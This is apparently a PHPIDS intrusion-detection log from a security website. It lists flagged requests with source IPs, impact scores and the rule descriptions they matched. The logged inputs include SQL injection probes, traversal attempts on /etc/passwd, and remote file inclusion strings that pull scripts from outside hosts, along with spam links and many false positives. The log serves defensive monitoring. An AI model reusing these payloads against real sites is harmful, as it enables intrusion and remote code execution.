Value:{"recent_searches":[[4,"energy star air conditioner","energy star air conditioner"],[4,"sharp 12000 btu air conditioner","sharp 12000 btu air conditioner"],[4,"sharp 14,500 btu air conditioner","sharp 14,500 btu air conditioner"],[4,"16471667985893622725","michael jackson discography"],[4,"2280771579875657745","where would I find a complete discography of Mahalia Jackson"]],"recent_products":[[1,"324186673486728"],[1,"271814026418533"]]}
Page:/i.php?page=fitness/images/opwhey.jpg
IP:64.124.148.184
Impact:94
Created:2010-04-23 15:57:40
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.4642857142857

ID:122369
Name:REQUEST.page
Value:1--
Page:/i.php?page=1--
IP:67.195.111.36
Impact:6
Created:2010-04-23 14:20:36
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122370
Name:GET.page
Value:1--
Page:/i.php?page=1--
IP:67.195.111.36
Impact:6
Created:2010-04-23 14:20:36
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122367
Name:REQUEST.page
Value:security/madmacs-mac-spoofer/<print.php?page=>http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt?
Page:/i.php?page=security/madmacs-mac-spoofer/%3Cprint.php?page=%3Ehttp://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt?
IP:66.246.72.50
Impact:18
Created:2010-04-23 06:51:31
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:122368
Name:GET.page
Value:security/madmacs-mac-spoofer/<print.php?page=>http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt?
Page:/i.php?page=security/madmacs-mac-spoofer/%3Cprint.php?page=%3Ehttp://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt?
IP:66.246.72.50
Impact:18
Created:2010-04-23 06:51:31
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:122365
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-23 06:40:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122366
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-23 06:40:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122363
Name:REQUEST.page
Value:security/<print.php?page=>http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt?
Page:/i.php?page=security/%3Cprint.php?page=%3Ehttp://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt?
IP:66.246.72.50
Impact:18
Created:2010-04-23 06:17:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:122364
Name:GET.page
Value:security/<print.php?page=>http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt?
Page:/i.php?page=security/%3Cprint.php?page=%3Ehttp://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt?
IP:66.246.72.50
Impact:18
Created:2010-04-23 06:17:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:122361
Name:REQUEST.page
Value:/../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passw
Page:/i.php?page=/../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passw%00
IP:67.195.111.36
Impact:30
Created:2010-04-23 03:19:29
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122362
Name:GET.page
Value:/../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passw
Page:/i.php?page=/../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passw%00
IP:67.195.111.36
Impact:30
Created:2010-04-23 03:19:29
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122359
Name:REQUEST.page
Value:security/ipinfo and 0=1 union select
Page:/i.php?page=security/ipinfo+and+0=1+union+select+
IP:113.168.250.112
Impact:20
Created:2010-04-23 02:52:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122360
Name:GET.page
Value:security/ipinfo and 0=1 union select
Page:/i.php?page=security/ipinfo+and+0=1+union+select+
IP:113.168.250.112
Impact:20
Created:2010-04-23 02:52:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122357
Name:REQUEST.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:113.162.245.242
Impact:20
Created:2010-04-23 00:53:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122358
Name:GET.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:113.162.245.242
Impact:20
Created:2010-04-23 00:53:54
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122355
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/fping
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/fping
IP:118.71.127.109
Impact:20
Created:2010-04-22 22:14:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122356
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/fping
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/fping
IP:118.71.127.109
Impact:20
Created:2010-04-22 22:14:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122353
Name:REQUEST.page
Value:security/ipinfo and 0=1 union select
Page:/i.php?page=security/ipinfo+and+0=1+union+select+
IP:118.71.127.109
Impact:20
Created:2010-04-22 22:14:11
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122354
Name:GET.page
Value:security/ipinfo and 0=1 union select
Page:/i.php?page=security/ipinfo+and+0=1+union+select+
IP:118.71.127.109
Impact:20
Created:2010-04-22 22:14:11
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122351
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.41
Impact:12
Created:2010-04-22 22:11:47
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122352
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.41
Impact:12
Created:2010-04-22 22:11:47
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122349
Name:REQUEST.page
Value:videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning_source=feedburner_medium=feed_campaign=Feed:+IrongeeksSecuritySite+(Irongeek's+Security+Site)_content=Google+Reader
Page:/i.php?page=videos%2Fusing-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning_source%3Dfeedburner_medium%3Dfeed_campaign%3DFeed%3A%2BIrongeeksSecuritySite%2B%28Irongeek%27s%2BSecurity%2BSite%29_content%3DGoogle%2BReader
IP:67.202.11.246
Impact:32
Created:2010-04-22 21:11:03
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122350
Name:GET.page
Value:videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning_source=feedburner_medium=feed_campaign=Feed:+IrongeeksSecuritySite+(Irongeek's+Security+Site)_content=Google+Reader
Page:/i.php?page=videos%2Fusing-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning_source%3Dfeedburner_medium%3Dfeed_campaign%3DFeed%3A%2BIrongeeksSecuritySite%2B%28Irongeek%27s%2BSecurity%2BSite%29_content%3DGoogle%2BReader
IP:67.202.11.246
Impact:32
Created:2010-04-22 21:11:03
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122348
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.178
Impact:42
Created:2010-04-22 17:54:09
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122347
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.178
Impact:42
Created:2010-04-22 17:54:08
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122345
Name:REQUEST.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%20%20%20%20%3Cbr%3E%20%20%20%20%3Ca%20href=
IP:66.249.67.178
Impact:8
Created:2010-04-22 16:42:33
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122346
Name:GET.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%20%20%20%20%3Cbr%3E%20%20%20%20%3Ca%20href=
IP:66.249.67.178
Impact:8
Created:2010-04-22 16:42:33
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122343
Name:REQUEST.codeme
Value:So where it to find?, <a href= http://pantyhosephotography.tumblr.com/ >pantyhose photography</a>, [url= http://pantyhosephotography.tumblr.com/ ]pantyhose photography[/url], siv,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:34
Created:2010-04-22 16:40:10
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122344
Name:POST.codeme
Value:So where it to find?, <a href= http://pantyhosephotography.tumblr.com/ >pantyhose photography</a>, [url= http://pantyhosephotography.tumblr.com/ ]pantyhose photography[/url], siv,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:34
Created:2010-04-22 16:40:10
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122341
Name:REQUEST.page
Value:security/hackers-crow//?_SERVER[DOCUMENT_ROOT]=http://gonapus.net/zero/icon/private_icon/q??
Page:/i.php?page=security/hackers-crow//?_SERVER[DOCUMENT_ROOT]=http://gonapus.net/zero/icon/private_icon/q??
IP:77.221.130.2
Impact:40
Created:2010-04-22 16:22:38
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122342
Name:GET.page
Value:security/hackers-crow//?_SERVER[DOCUMENT_ROOT]=http://gonapus.net/zero/icon/private_icon/q??
Page:/i.php?page=security/hackers-crow//?_SERVER[DOCUMENT_ROOT]=http://gonapus.net/zero/icon/private_icon/q??
IP:77.221.130.2
Impact:40
Created:2010-04-22 16:22:38
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122339
Name:REQUEST.page
Value:security//?_SERVER[DOCUMENT_ROOT]=http://gonapus.net/zero/icon/private_icon/q??
Page:/i.php?page=security//?_SERVER[DOCUMENT_ROOT]=http://gonapus.net/zero/icon/private_icon/q??
IP:77.221.130.2
Impact:40
Created:2010-04-22 16:22:33
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122340
Name:GET.page
Value:security//?_SERVER[DOCUMENT_ROOT]=http://gonapus.net/zero/icon/private_icon/q??
Page:/i.php?page=security//?_SERVER[DOCUMENT_ROOT]=http://gonapus.net/zero/icon/private_icon/q??
IP:77.221.130.2
Impact:40
Created:2010-04-22 16:22:33
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122337
Name:REQUEST.codeme
Value:Give somebody the to a site about the, <a href= http://dirtcheapcigarettes.tumblr.com/ >Buy dirt cheap cigarettes</a>, [url= http://dirtcheapcigarettes.tumblr.com/ ]Buy dirt cheap cigarettes[/url], :-OOO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 15:21:32
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122338
Name:POST.codeme
Value:Give somebody the to a site about the, <a href= http://dirtcheapcigarettes.tumblr.com/ >Buy dirt cheap cigarettes</a>, [url= http://dirtcheapcigarettes.tumblr.com/ ]Buy dirt cheap cigarettes[/url], :-OOO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 15:21:32
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122335
Name:REQUEST.codeme
Value:Nice, <a href= http://cheapcigarettesonline.tumblr.com/#1 >Only cheap cigarettes online</a> [url=http://cheapcigarettesonline.tumblr.com/#1]Only cheap cigarettes online[/url], 557184,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:34
Created:2010-04-22 14:42:22
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122336
Name:POST.codeme
Value:Nice, <a href= http://cheapcigarettesonline.tumblr.com/#1 >Only cheap cigarettes online</a> [url=http://cheapcigarettesonline.tumblr.com/#1]Only cheap cigarettes online[/url], 557184,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:34
Created:2010-04-22 14:42:22
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122333
Name:REQUEST.page
Value:/etc/passwd
Page:/i.php?page=/etc/passwd%00
IP:67.195.111.36
Impact:20
Created:2010-04-22 14:03:16
Details:
Description: Detects etc/passwd inclusion attempts | Tags: dt, id, lfi | ID: 12
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122334
Name:GET.page
Value:/etc/passwd
Page:/i.php?page=/etc/passwd%00
IP:67.195.111.36
Impact:20
Created:2010-04-22 14:03:16
Details:
Description: Detects etc/passwd inclusion attempts | Tags: dt, id, lfi | ID: 12
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122329
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:04
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122330
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:04
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122331
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:04
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122332
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:04
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122307
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122308
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122309
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122310
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122311
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122312
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122313
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122314
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122315
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122316
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122317
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122318
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122319
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
